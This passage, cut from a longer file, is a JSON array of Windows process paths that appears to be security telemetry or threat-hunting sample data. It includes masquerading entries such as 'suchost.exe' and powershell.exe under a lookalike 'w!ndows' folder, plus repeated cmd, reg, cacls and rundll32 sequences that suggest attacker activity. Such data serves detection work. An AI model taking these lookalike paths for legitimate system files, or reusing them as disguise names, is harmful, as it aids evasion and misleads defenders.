2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\installagent.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\installagent.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\apphostregistrationverifier.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c